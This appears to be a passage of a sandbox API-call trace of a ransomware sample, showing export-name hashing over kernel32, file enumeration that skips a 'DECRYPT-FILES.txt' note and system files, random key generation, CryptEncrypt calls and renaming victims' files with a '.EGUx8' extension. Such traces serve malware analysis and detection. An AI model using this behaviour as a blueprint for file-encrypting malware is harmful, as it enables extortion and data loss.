lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.873] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.873] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.873] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.873] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.873] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.874] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.874] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.874] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.874] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.874] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.874] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.874] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.874] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.874] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.874] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.874] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.874] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.874] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.874] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.874] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.874] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.874] lstrlenA (lpString="DELETEATOM") returned 10 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.874] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.875] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.875] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.875] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.875] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.875] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.875] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.875] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.875] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.875] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.875] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.875] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.875] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.875] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.875] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.875] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.875] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.875] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.875] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.876] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.876] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.876] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.876] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.876] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.876] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.876] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.876] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.876] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.876] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.876] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.876] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.876] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.876] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.876] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.876] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.876] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.876] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.876] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.877] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.877] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.877] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.877] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3Evtxg4xh6 tW 9uys.bmp") returned 60 [0082.877] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3Evtxg4xh6 tW 9uys.bmp.EGUx8") returned 66 [0082.877] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3Evtxg4xh6 tW 9uys.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3evtxg4xh6 tw 9uys.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3Evtxg4xh6 tW 9uys.bmp.EGUx8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3evtxg4xh6 tw 9uys.bmp.egux8"), dwFlags=0x0) returned 1 [0082.878] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.878] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.878] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.878] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa499210, ftCreationTime.dwHighDateTime=0x1d4d24d, ftLastAccessTime.dwLowDateTime=0x4a289570, ftLastAccessTime.dwHighDateTime=0x1d4d338, ftLastWriteTime.dwLowDateTime=0x4a289570, ftLastWriteTime.dwHighDateTime=0x1d4d338, nFileSizeHigh=0x0, nFileSizeLow=0x17b36, dwReserved0=0x0, dwReserved1=0x0, cFileName="5-fWrl.mp3", cAlternateFileName="")) returned 1 [0082.878] lstrcmpiW (lpString1="5-fWrl.mp3", lpString2="DECRYPT-FILES.txt") returned -1 [0082.878] lstrcmpiW (lpString1="5-fWrl.mp3", lpString2="autorun.inf") returned -1 [0082.878] lstrcmpiW (lpString1="5-fWrl.mp3", lpString2="boot.ini") returned -1 [0082.878] lstrcmpiW (lpString1="5-fWrl.mp3", lpString2="desktop.ini") returned -1 [0082.878] lstrcmpiW (lpString1="5-fWrl.mp3", lpString2="ntuser.dat") returned -1 [0082.878] lstrcmpiW (lpString1="5-fWrl.mp3", lpString2="iconcache.db") returned -1 [0082.878] lstrcmpiW (lpString1="5-fWrl.mp3", lpString2="bootsect.bak") returned -1 [0082.878] lstrcmpiW (lpString1="5-fWrl.mp3", lpString2="ntuser.dat.log") returned -1 [0082.879] lstrcmpiW (lpString1="5-fWrl.mp3", lpString2="thumbs.db") returned -1 [0082.879] lstrcmpiW (lpString1="5-fWrl.mp3", lpString2="Bootfont.bin") returned -1 [0082.879] lstrlenW (lpString="5-fWrl.mp3") returned 10 [0082.879] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0082.879] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0082.879] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0082.879] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0082.879] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0082.879] lstrlenW (lpString="5-fWrl.mp3") returned 10 [0082.879] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0082.879] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="5-fWrl.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5-fWrl.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5-fWrl.mp3" [0082.879] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5-fWrl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5-fwrl.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0082.879] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=97078) returned 1 [0082.879] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0082.880] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0082.880] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.880] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.880] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.880] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0082.880] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0082.882] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.882] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0082.883] CloseHandle (hObject=0x43c) returned 1 [0082.883] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.883] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0082.884] CloseHandle (hObject=0x0) returned 0 [0082.884] CloseHandle (hObject=0x438) returned 1 [0082.884] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.884] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.885] GetTickCount () returned 0x114d318 [0082.885] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.885] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.885] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.885] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.885] lstrlenA (lpString="kernel32.dll") returned 12 [0082.885] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.886] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.886] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.886] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.886] lstrlenA (lpString="ADDATOMA") returned 8 [0082.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.886] lstrlenA (lpString="ADDATOMW") returned 8 [0082.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.886] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.886] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.886] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.886] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.886] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.886] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.886] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.886] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.886] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.886] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.886] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.886] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.886] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.887] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.887] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.887] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.887] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.887] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.887] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.887] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.887] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.887] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.887] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.887] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") 